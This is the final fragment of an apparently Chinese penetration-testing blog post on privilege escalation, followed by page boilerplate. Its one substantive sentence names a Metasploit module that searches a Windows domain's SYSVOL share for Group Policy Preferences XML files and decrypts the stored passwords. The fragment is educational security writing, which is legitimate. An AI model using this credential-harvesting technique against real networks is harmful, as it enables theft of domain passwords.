<p>msf中内置了<code>post/windows/gather/credentials/gpp</code>模块，可以自动化搜索位于SYSVOL共享目录的XML，并从中解出密码。</p>
</div></article><div class="post-copyright"><div class="post-copyright__author"><span class="post-copyright-meta">文章作者: </span><span class="post-copyright-info"><a href="mailto:undefined">Dar1in9</a></span></div><div class="post-copyright__type"><span class="post-copyright-meta">文章链接: </span><span class="post-copyright-info"><a href="http://dar1in9s.github.io/2023/04/04/内网渗透/权限提升/">http://dar1in9s.github.io/2023/04/04/内网渗透/权限提升/</a></span></div><div class="post-copyright__notice"><span class="post-copyright-meta">版权声明: </span><span class="post-copyright-info">本博客所有文章除特别声明外，均采用 <a target="_blank" rel="noopener" href="https://creativecommons.org/licenses/by-nc-sa/4.0/">CC BY-NC-SA 4.0</a> 许可协议。转载请注明来自 <a href="http://Dar1in9s.github.io">Dar1in9's Blog</a>！</span></div></div><div class="post-meta__tag-list"></div><nav id="pagination"><div class="prev-post pull-left"><a href="/2023/04/05/%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F/%E5%86%85%E7%BD%91%E6%A8%AA%E5%90%91%E7%A7%BB%E5%8A%A8/"><i class="fa fa-chevron-left">  </i><span>内网渗透之横向移动</span></a></div><div class="next-post pull-right"><a href="/2023/04/03/%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F/%E7%AB%AF%E5%8F%A3%E8%BD%AC%E5%8F%91%E4%B8%8E%E5%86%85%E7%BD%91%E4%BB%A3%E7%90%86/"><span>内网渗透之内网代理</span><i class="fa fa-chevron-right"></i></a></div></nav></div></div><footer class="footer-bg" style="background-image: url(https://blog-1300147235.cos.ap-chengdu.myqcloud.com/Background2.png)"><div class="layout" id="footer"><div class="copyright">&copy;2020 - 2023 By Dar1in9</div><div class="framework-info"><span>驱动 - </span><a target="_blank" rel="noopener" href="http://hexo.io"><span>Hexo</span></a><span class="footer-separator">|</span><span>主题 - </span><a target="_blank" rel="noopener" href="https://github.com/Molunerfinn/hexo-theme-melody"><span>Melody</span></a></div><div class="busuanzi"><script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script><span id="busuanzi_container_page_pv"><i class="fa fa-file"></i><span id="busuanzi_value_page_pv"></span><span></span></span></div></div></footer><i class="fa fa-arrow-up" id="go-up" aria-hidden="true"></i><script src="https://cdn.jsdelivr.net/npm/animejs@latest/anime.min.js"></script><script src="https://cdn.jsdelivr.net/npm/jquery@latest/dist/jquery.min.js"></script><script src="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@latest/dist/jquery.fancybox.min.js"></script><script src="https://cdn.jsdelivr.net/npm/velocity-animate@latest/velocity.min.js"></script><script src="https://cdn.jsdelivr.net/npm/velocity-ui-pack@latest/velocity.ui.min.js"></script><script src="/js/utils.js?version=1.9.0"></script><script src="/js/fancybox.js?version=1.9.0"></script><script src="/js/sidebar.js?version=1.9.0"></script><script src="/js/copy.js?version=1.9.0"></script><script src="/js/fireworks.js?version=1.9.0"></script><script src="/js/transition.js?version=1.9.0"></script><script src="/js/scroll.js?version=1.9.0"></script><script src="/js/head.js?version=1.9.0"></script><script src="/js/search/algolia.js"></script><script>if(/Android|webOS|iPhone|iPod|iPad|BlackBerry/i.test(navigator.userAgent)) {
  $('#nav').addClass('is-mobile')
  $('footer').addClass('is-mobile')
  $('#top-container').addClass('is-mobile')
}</script><div class="search-dialog" id="algolia-search"><div class="search-dialog__title" id="algolia-search-title">Algolia</div><div id="algolia-input-panel"><div id="algolia-search-input"></div></div><hr><div id="algolia-search-results"><div id="algolia-hits"></div><div id="algolia-pagination"></div><div id="algolia-stats"></div></div><span class="search-close-button"><i class="fa fa-times"></i></span></div><div class="search-mask"></div></body></html>